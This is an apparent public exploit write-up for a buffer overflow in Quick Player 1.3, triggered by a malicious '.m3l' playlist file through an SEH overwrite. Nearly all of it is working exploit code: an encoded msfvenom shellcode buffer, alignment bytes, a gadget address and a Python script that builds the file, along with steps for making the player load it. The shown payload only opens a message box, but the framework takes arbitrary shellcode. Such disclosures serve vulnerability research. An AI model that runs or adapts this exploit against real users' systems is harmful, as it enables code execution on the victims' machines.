# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
# 2.- Open the application,
# 3.- Click on the bottom-right button with the letters "PL"
# 4.- Select the option "File"
# 5.- Click "Load List"
# 6.- Select poc.m3l
# 7.- Profit
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif
# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX
# Payload size: 640 bytes
buf =b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b"
buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47"
buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51"
buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d"
buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50"
buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a"
buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30"
buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d"
buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a"
buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a"
buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44"
buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69"
buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67"
buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59"
buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51"
buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62"
buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51"
buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52"
buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42"
buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79"
buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32"
buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71"
buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50"
buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59"
buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38"
buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50"
buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45"
buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a"
buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64"
buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e"
buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48"
buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71"
buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35"
buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e"
buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39"
buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61"
buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39"
buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e"
buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f"
buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c"
buf += b"\x48\x41\x41"
alignment = "\x54\x71"# push esp, padding
alignment += "\x58\x71" # pop eax, padding
alignment += "\x05\x20\x22" # add eax, 0x22002000
alignment += "\x71" # Padding
alignment += "\x2D\x19\x22" # sub eax, 0x22001900
alignment += "\x71" # Padding
alignment += "\x50\x71" # push eax, padding
alignment += "\xC3" # retn
ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe)
buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()